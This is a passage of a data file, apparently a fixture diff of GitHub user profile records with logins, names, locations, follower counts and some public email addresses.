"", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2538, + "fields": { + "nest_created_at": "2024-09-12T01:31:34.656Z", + "nest_updated_at": "2024-09-22T19:40:30.943Z", + "name": "", + "login": "Gator8", + "email": "kevin@kjquinn.ca", + "avatar_url": "https://avatars.githubusercontent.com/u/7840300?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-06-09T16:30:51Z", + "updated_at": "2024-05-19T19:26:43Z", + "node_id": "MDQ6VXNlcjc4NDAzMDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2539, + "fields": { + "nest_created_at": "2024-09-12T01:31:40.115Z", + "nest_updated_at": "2024-09-12T02:07:43.850Z", + "name": "", + "login": "clin4", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26919744?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-04-05T07:27:33Z", + "updated_at": "2023-12-12T19:19:40Z", + "node_id": "MDQ6VXNlcjI2OTE5NzQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2540, + "fields": { + "nest_created_at": "2024-09-12T01:31:41.861Z", + "nest_updated_at": "2024-09-12T01:31:41.861Z", + "name": "Kirill Bobrov", + "login": "KirillBobrov06", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41997200?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-08-01T11:58:34Z", + "updated_at": "2023-12-01T15:33:38Z", + "node_id": "MDQ6VXNlcjQxOTk3MjAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2541, + "fields": { + "nest_created_at": "2024-09-12T01:31:48.589Z", + "nest_updated_at": "2024-09-16T22:28:41.272Z", + "name": "AnilFe", + "login": "anilfe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34770392?v=4", + "company": "", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-12-22T12:02:53Z", + "updated_at": "2023-12-12T12:06:17Z", + "node_id": "MDQ6VXNlcjM0NzcwMzky", + "bio": "Ars longa vita brevis", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2542, + "fields": { + "nest_created_at": "2024-09-12T01:31:52.336Z", + "nest_updated_at": "2024-09-16T22:28:42.261Z", + "name": "shuaihu", + "login": "sxgnhs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35444755?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-01-15T06:20:23Z", + "updated_at": "2024-01-03T02:19:29Z", + "node_id": "MDQ6VXNlcjM1NDQ0NzU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2543, + "fields": { + "nest_created_at": "2024-09-12T01:31:54.002Z", + "nest_updated_at": "2024-09-12T01:31:54.002Z", + "name": "", + "login": "Azulath", + "email": "alexander.zrinyi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5717474?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-10-18T10:39:26Z", + "updated_at": "2024-08-26T21:19:38Z", + "node_id": "MDQ6VXNlcjU3MTc0NzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2544, + "fields": { + "nest_created_at": "2024-09-12T01:31:57.035Z", + "nest_updated_at": "2024-09-12T02:07:57.690Z", + "name": "W. de Boer", + "login": "walterdeboer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11032733?v=4", + "company": "", + "location": "Groningen", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-02-16T17:07:08Z", + "updated_at": "2024-05-06T11:36:28Z", + "node_id": "MDQ6VXNlcjExMDMyNzMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2545, + "fields": { + "nest_created_at": "2024-09-12T01:32:06.681Z", + "nest_updated_at": "2024-09-12T01:33:18.070Z", + "name": "", + "login": "FabioRighe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37578397?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-03-20T10:21:16Z", + "updated_at": "2023-05-19T08:36:47Z", + "node_id": "MDQ6VXNlcjM3NTc4Mzk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2546, + "fields": { + "nest_created_at": "2024-09-12T01:32:11.334Z", + "nest_updated_at": "2024-09-22T20:30:46.044Z", + "name": "Roberto Polli", + "login": "ioggstream", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1140844?v=4", + "company": "@par-tec ", + "location": "Latina, Italia", + "collaborators_count": 0, + "following_count": 101, + "followers_count": 113, + "public_gists_count": 130, + "public_repositories_count": 316, + "created_at": "2011-10-20T14:03:08Z", + "updated_at": "2024-08-03T17:18:07Z", + "node_id": "MDQ6VXNlcjExNDA4NDQ=", + "bio": "Python enthusiast, former mathematician, opensource lover. @httpwg @italia ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2547, + "fields": { + "nest_created_at": "2024-09-12T01:32:14.697Z", + "nest_updated_at": "2024-09-12T01:32:20.610Z", + "name": "", + "login": "bburdick-code", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61505667?v=4", + "company": "", + "location": "St. Louis", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2020-02-26T13:33:06Z", + "updated_at": "2023-03-03T16:10:15Z", + "node_id": "MDQ6VXNlcjYxNTA1NjY3", + "bio": "From 2016-2020, I have worked as a control systems engineer. My favorite part was programming, and I am ready to make it a full time gig. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2548, + "fields": { + "nest_created_at": "2024-09-12T01:32:15.962Z", + "nest_updated_at": "2024-09-16T22:28:43.270Z", + "name": "", + "login": "sathish-ather", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81147114?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-03-22T07:19:14Z", + "updated_at": "2024-09-10T09:53:04Z", + "node_id": "MDQ6VXNlcjgxMTQ3MTE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2549, + "fields": { + "nest_created_at": "2024-09-12T01:32:19.314Z", + "nest_updated_at": "2024-09-12T01:32:19.314Z", + "name": "aditya ranaut", + "login": "phoenix-aditya", + "email": "ranout.aditya@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/57615219?v=4", + "company": "@projectX-india ", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 26, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2019-11-11T07:21:36Z", + "updated_at": "2024-08-28T12:30:45Z", + "node_id": "MDQ6VXNlcjU3NjE1MjE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2550, + "fields": { + "nest_created_at": "2024-09-12T01:32:21.870Z", + "nest_updated_at": "2024-09-12T01:32:21.870Z", + "name": "", + "login": "ab235g", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11493921?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-03-16T00:58:13Z", + "updated_at": "2023-08-09T22:52:35Z", + "node_id": "MDQ6VXNlcjExNDkzOTIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2551, + "fields": { + "nest_created_at": "2024-09-12T01:32:23.554Z", + "nest_updated_at": "2024-09-12T01:32:23.554Z", + "name": "Amael", + "login": "AppSecAmael", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99711941?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2022-02-15T06:10:22Z", + "updated_at": "2024-08-09T15:29:13Z", + "node_id": "U_kgDOBfF7xQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2552, + "fields": { + "nest_created_at": "2024-09-12T01:32:26.518Z", + "nest_updated_at": "2024-09-12T01:32:26.518Z", + "name": "Matija Folnovic", + "login": "mfolnovic", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20919?v=4", + "company": "", + "location": "Zagreb, Croatia", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 17, + "public_gists_count": 7, + "public_repositories_count": 28, + "created_at": "2008-08-17T11:07:27Z", + "updated_at": "2024-08-22T11:53:30Z", + "node_id": "MDQ6VXNlcjIwOTE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2553, + "fields": { + "nest_created_at": "2024-09-12T01:32:34.053Z", + "nest_updated_at": "2024-09-22T19:28:44.313Z", + "name": "", + "login": "mischa-n", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54059083?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-08-13T08:12:05Z", + "updated_at": "2023-05-03T09:04:10Z", + "node_id": "MDQ6VXNlcjU0MDU5MDgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2554, + "fields": { + "nest_created_at": "2024-09-12T01:32:37.313Z", + "nest_updated_at": "2024-09-12T01:32:37.313Z", + "name": "xsc", + "login": "xscsaa123456", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121541322?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-12-28T07:24:31Z", + "updated_at": "2024-09-05T09:31:08Z", + "node_id": "U_kgDOBz6Syg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2555, + "fields": { + "nest_created_at": "2024-09-12T01:32:38.977Z", + "nest_updated_at": "2024-09-12T01:32:38.977Z", + "name": "Marc Elser", + "login": "marcelser", + "email": "melser@gmx.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/109926?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2009-07-29T17:05:22Z", + "updated_at": "2024-09-03T08:14:33Z", + "node_id": "MDQ6VXNlcjEwOTkyNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2556, + "fields": { + "nest_created_at": "2024-09-12T01:32:49.033Z", + "nest_updated_at": "2024-09-12T01:32:49.033Z", + "name": "", + "login": "h4r7w3l1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36492399?v=4", + "company": "", + "location": "localhost", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 4, + "public_gists_count": 4, + "public_repositories_count": 16, + "created_at": "2018-02-14T23:41:59Z", + "updated_at": "2024-08-20T11:51:38Z", + "node_id": "MDQ6VXNlcjM2NDkyMzk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2557, + "fields": { + "nest_created_at": "2024-09-12T01:32:51.958Z", + "nest_updated_at": "2024-09-12T01:32:51.958Z", + "name": "Kashish Topiwala", + "login": "kashishtopi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46081558?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2018-12-23T06:55:55Z", + "updated_at": "2024-08-03T16:17:23Z", + "node_id": "MDQ6VXNlcjQ2MDgxNTU4", + "bio": "Learning to Automate stuff. Demystifying complex topics as a hobby.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2558, + "fields": { + "nest_created_at": "2024-09-12T01:32:53.367Z", + "nest_updated_at": "2024-09-12T01:32:53.367Z", + "name": "Zack Sarver", + "login": "zts3y", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42187698?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-08-07T19:41:39Z", + "updated_at": "2024-08-06T02:49:33Z", + "node_id": "MDQ6VXNlcjQyMTg3Njk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2559, + "fields": { + "nest_created_at": "2024-09-12T01:32:56.242Z", + "nest_updated_at": "2024-09-12T01:32:56.242Z", + "name": "", + "login": "20appy23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/130068935?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-04-06T13:40:26Z", + "updated_at": "2024-05-25T05:59:04Z", + "node_id": "U_kgDOB8Cxxw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2560, + "fields": { + "nest_created_at": "2024-09-12T01:32:57.917Z", + "nest_updated_at": "2024-09-16T22:28:46.441Z", + "name": "Roman Sholokh", + "login": "rsholokh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67190621?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2020-06-20T11:10:55Z", + "updated_at": "2023-08-12T17:20:46Z", + "node_id": "MDQ6VXNlcjY3MTkwNjIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2561, + "fields": { + "nest_created_at": "2024-09-12T01:32:59.146Z", + "nest_updated_at": "2024-09-16T22:28:44.376Z", + "name": "", + "login": "TerrySunTW", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8406228?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2014-08-10T03:59:31Z", + "updated_at": "2024-08-15T00:03:12Z", + "node_id": "MDQ6VXNlcjg0MDYyMjg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2562, + "fields": { + "nest_created_at": "2024-09-12T01:33:00.852Z", + "nest_updated_at": "2024-09-12T01:33:00.852Z", + "name": "Ben Edwards", + "login": "Legeril", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48111476?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-03-01T02:24:39Z", + "updated_at": "2024-01-31T20:01:58Z", + "node_id": "MDQ6VXNlcjQ4MTExNDc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2563, + "fields": { + "nest_created_at": "2024-09-12T01:33:03.773Z", + "nest_updated_at": "2024-09-12T01:33:03.773Z", + "name": "Antanas Jasaitis", + "login": "antanasja", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20260179?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-07-02T20:52:04Z", + "updated_at": "2024-06-18T17:17:46Z", + "node_id": "MDQ6VXNlcjIwMjYwMTc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2564, + "fields": { + "nest_created_at": "2024-09-12T01:33:12.657Z", + "nest_updated_at": "2024-09-12T01:33:12.657Z", + "name": "", + "login": "josecu08", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31317588?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-08-24T15:41:46Z", + "updated_at": "2023-12-02T20:04:04Z", + "node_id": "MDQ6VXNlcjMxMzE3NTg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2565, + "fields": { + "nest_created_at": "2024-09-12T01:33:13.904Z", + "nest_updated_at": "2024-09-12T01:33:13.904Z", + "name": "Marais van Zyl", + "login": "mieliespoor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5008243?v=4", + "company": "Verizon", + "location": "Dublin", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2013-07-14T19:20:42Z", + "updated_at": "2024-07-05T22:35:17Z", + "node_id": "MDQ6VXNlcjUwMDgyNDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2566, + "fields": { + "nest_created_at": "2024-09-12T01:33:15.135Z", + "nest_updated_at": "2024-09-12T01:33:15.135Z", + "name": "Roberto Sanchez", + "login": "rsanchez-s", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41480001?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-07-20T13:58:14Z", + "updated_at": "2024-08-26T01:37:33Z", + "node_id": "MDQ6VXNlcjQxNDgwMDAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2567, + "fields": { + "nest_created_at": "2024-09-12T01:33:20.607Z", + "nest_updated_at": "2024-09-12T01:33:20.607Z", + "name": "Erika Dvarionaite", + "login": "ErikaDva", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43474174?v=4", + "company": "", + "location": "Denmark", + "collaborators_count": 0, + "following_count": 101, + "followers_count": 38, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2018-09-21T13:44:52Z", + "updated_at": "2024-09-10T12:57:44Z", + "node_id": "MDQ6VXNlcjQzNDc0MTc0", + "bio": "Data Engineer | R/Shiny Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2568, + "fields": { + "nest_created_at": "2024-09-12T01:33:21.842Z", + "nest_updated_at": "2024-09-12T01:34:23.749Z", + "name": "Javier J. Salmerón García", + "login": "javsalgar", + "email": "javier.salmeron@broadcom.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1133777?v=4", + "company": "Broadcom", + "location": "Seville, Spain", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 92, + "public_gists_count": 13, + "public_repositories_count": 44, + "created_at": "2011-10-17T17:20:57Z", + "updated_at": "2024-09-11T14:47:57Z", + "node_id": "MDQ6VXNlcjExMzM3Nzc=", + "bio": "Staff Engineer @ Broadcom", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2569, + "fields": { + "nest_created_at": "2024-09-12T01:33:23.523Z", + "nest_updated_at": "2024-09-12T01:33:23.523Z", + "name": "", + "login": "Lifter-PL", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31290686?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-08-23T19:27:08Z", + "updated_at": "2023-06-21T12:39:42Z", + "node_id": "MDQ6VXNlcjMxMjkwNjg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2570, + "fields": { + "nest_created_at": "2024-09-12T01:33:25.172Z", + "nest_updated_at": "2024-09-12T01:33:39.503Z", + "name": "Peter Kline", + "login": "peterkline", + "email": "peterkline@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/518270?v=4", + "company": "@seluxdx ", + "location": "New Hampshire", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2010-12-10T19:52:08Z", + "updated_at": "2024-08-16T15:24:40Z", + "node_id": "MDQ6VXNlcjUxODI3MA==", + "bio": "Doing the DevOps thing for a hell of a long time. I like cold beverages", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2571, + "fields": { + "nest_created_at": "2024-09-12T01:33:26.845Z", + "nest_updated_at": "2024-09-22T20:29:40.631Z", + "name": "", + "login": "Marx314", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1593248?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2012-03-31T13:44:15Z", + "updated_at": "2024-02-10T14:13:59Z", + "node_id": "MDQ6VXNlcjE1OTMyNDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2572, + "fields": { + "nest_created_at": "2024-09-12T01:33:28.492Z", + "nest_updated_at": "2024-09-12T01:33:28.492Z", + "name": "Erwan de FERRIERES", + "login": "erwandf", + "email": "erwan.deferrieres@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/397629?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2010-09-13T15:21:23Z", + "updated_at": "2024-06-07T13:27:36Z", + "node_id": "MDQ6VXNlcjM5NzYyOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2573, + "fields": { + "nest_created_at": "2024-09-12T01:33:31.994Z", + "nest_updated_at": "2024-09-12T01:33:31.994Z", + "name": "", + "login": "Souhila99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92251867?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-10-10T10:08:06Z", + "updated_at": "2024-07-29T13:44:20Z", + "node_id": "U_kgDOBX-m2w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2574, + "fields": { + "nest_created_at": "2024-09-12T01:33:40.727Z", + "nest_updated_at": "2024-09-12T01:33:43.694Z", + "name": "Grégoire", + "login": "Trakeur", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83607654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-05-03T18:20:00Z", + "updated_at": "2024-08-12T12:23:21Z", + "node_id": "MDQ6VXNlcjgzNjA3NjU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2575, + "fields": { + "nest_created_at": "2024-09-12T01:33:47.866Z", + "nest_updated_at": "2024-09-12T02:08:09.345Z", + "name": "Nick Castelli", + "login": "nvcastelli", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3475905?v=4", + "company": "", + "location": "Austin, Tx", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2013-02-04T21:51:41Z", + "updated_at": "2024-07-23T18:59:12Z", + "node_id": "MDQ6VXNlcjM0NzU5MDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2576, + "fields": { + "nest_created_at": "2024-09-12T01:33:50.746Z", + "nest_updated_at": "2024-09-22T19:39:43.265Z", + "name": "Brian Wilkinson", + "login": "brianwilkinson", + "email": "brian.wilkinson@fasthosts.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18575959?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-04-20T13:43:36Z", + "updated_at": "2024-09-16T14:23:39Z", + "node_id": "MDQ6VXNlcjE4NTc1OTU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2577, + "fields": { + "nest_created_at": "2024-09-12T01:33:57.261Z", + "nest_updated_at": "2024-09-12T01:33:57.261Z", + "name": "", + "login": "gulsezim11", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38872591?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-05-01T01:55:58Z", + "updated_at": "2023-05-25T12:23:06Z", + "node_id": "MDQ6VXNlcjM4ODcyNTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2578, + "fields": { + "nest_created_at": "2024-09-12T01:33:59.332Z", + "nest_updated_at": "2024-09-12T01:33:59.332Z", + "name": "Andrei Kouznetchik", + "login": "akouznetchik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129385936?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-03-30T10:26:41Z", + "updated_at": "2024-09-04T07:57:12Z", + "node_id": "U_kgDOB7ZF0A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2579, + "fields": { + "nest_created_at": "2024-09-12T01:34:01.958Z", + "nest_updated_at": "2024-09-12T01:34:01.958Z", + "name": "Damian Śnieżek", + "login": "snieguu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6084074?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2013-12-02T09:11:32Z", + "updated_at": "2024-08-02T05:56:17Z", + "node_id": "MDQ6VXNlcjYwODQwNzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2580, + "fields": { + "nest_created_at": "2024-09-12T01:34:03.673Z", + "nest_updated_at": "2024-09-12T01:38:01.881Z", + "name": "", + "login": "khaledgithubwl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101721949?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-16T13:20:02Z", + "updated_at": "2024-06-03T13:59:53Z", + "node_id": "U_kgDOBhAnXQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2581, + "fields": { + "nest_created_at": "2024-09-12T01:34:11.859Z", + "nest_updated_at": "2024-09-12T01:34:11.859Z", + "name": "", + "login": "geirhede", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110812801?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-08-08T07:47:15Z", + "updated_at": "2023-09-21T12:32:45Z", + "node_id": "U_kgDOBpregQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2582, + "fields": { + "nest_created_at": "2024-09-12T01:34:14.330Z", + "nest_updated_at": "2024-09-12T01:34:14.330Z", + "name": "", + "login": "attilakarpatiorion", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/138430324?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-07-03T05:44:02Z", + "updated_at": "2023-10-05T00:05:25Z", + "node_id": "U_kgDOCEBHdA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2583, + "fields": { + "nest_created_at": "2024-09-12T01:34:15.590Z", + "nest_updated_at": "2024-09-18T19:06:58.993Z", + "name": "", + "login": "WDN2010", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28731738?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-05-16T12:54:42Z", + "updated_at": "2024-09-16T10:08:30Z", + "node_id": "MDQ6VXNlcjI4NzMxNzM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2584, + "fields": { + "nest_created_at": "2024-09-12T01:34:17.293Z", + "nest_updated_at": 